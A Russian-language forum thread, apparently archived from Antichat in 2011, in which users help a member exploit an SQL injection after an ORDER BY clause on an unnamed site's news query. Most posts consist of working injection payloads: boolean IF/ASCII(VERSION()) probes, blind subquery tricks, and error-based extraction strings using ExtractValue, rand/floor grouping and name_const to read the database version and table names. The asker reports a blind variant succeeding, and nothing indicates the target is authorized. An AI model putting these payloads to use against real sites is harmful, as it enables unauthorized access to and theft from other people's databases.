ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
02.05.2011, 16:42
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Как можно раскрутить инъекцию при таком запросе? Работал с разными случиями, но такого не встречал.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM news ORDER BY ID $SQL[/COLOR][/COLOR]
Известна структура таблицы. Все поля кроме ID - tinytext, и ещё одно INT, но оно у всех одинаковое. |
|
|
02.05.2011, 17:06
|
|
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
Провел на форуме:
1410429
Репутация:
214
|
|
может я не до конца понил, не пробывал, чисто первое что пришло на ум:
Код:
Code:
SELECT * FROM news ORDER BY ID, IF(ASCII(VERSION())>32,1,2)
соответсвенно выдача по идее должна быть разная, если ascii(version())>32, то сортировка по 1-му полю, если нет то по второму.
P.S. возможно это бред, пишу в состоянии опьянения, близко к сердцу не воспринимать |
|
|
|
02.05.2011, 17:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Если вывод ошибки есть, то можно вполне крутить как еррор бейсед, если вывода нет то как слепую.
Вот примеры с рдота:
Код:
Code:
Инъекция после order by
Слепая (more than 1 row)
script.php?par=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))
В ошибке
(ExtractValue)
script.php?par=id,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--
(rand)
script.php?par=(select 1 from (select count(0),concat((select version()),floor(rand(0)*2)) from information_schema.tables group by 2 limit 1)a)--
(name_const)
script.php?par=(select*from(select name_const(version(),1),name_const(version(),1))a)
|
|
|
|
02.05.2011, 19:22
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Если бы был вывод ошибки я б и сам разобрался. Тут нет.
Сообщение от lukmus
lukmus said:
может я не до конца понил, не пробывал, чисто первое что пришло на ум:
Код:
Code:
SELECT * FROM news ORDER BY ID, IF(ASCII(VERSION())>32,1,2)
соответсвенно выдача по идее должна быть разная, если ascii(version())>32, то сортировка по 1-му полю, если нет то по второму.
P.S. возможно это бред, пишу в состоянии опьянения, близко к сердцу не воспринимать Вывод есть в любом случае и так:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"],%[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]IF%[/COLOR][COLOR="#0000BB"]28ASCII[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]28VERSION[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]28[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3E32[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][/COLOR]
И так:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"],%[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]IF%[/COLOR][COLOR="#0000BB"]28ASCII[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]28VERSION[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]28[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3E100000[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][/COLOR]
И так:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"],%[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]IF%[/COLOR][COLOR="#0000BB"]28ASCII[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]28VERSION[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]28[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3E1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][/COLOR]
Что предпринимать, не знаю.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"],%[/COLOR][COLOR="#0000BB"]28select[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]if%[/COLOR][COLOR="#0000BB"]28substring[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]28version[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]28[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],%[/COLOR][COLOR="#0000BB"]28select[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]201[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]20union[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]20select[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]202[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][/COLOR]
Этот вариант вроде работает, когда 4 изменяю на 5 - выводит информацию. буду крутить, спасибо. |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
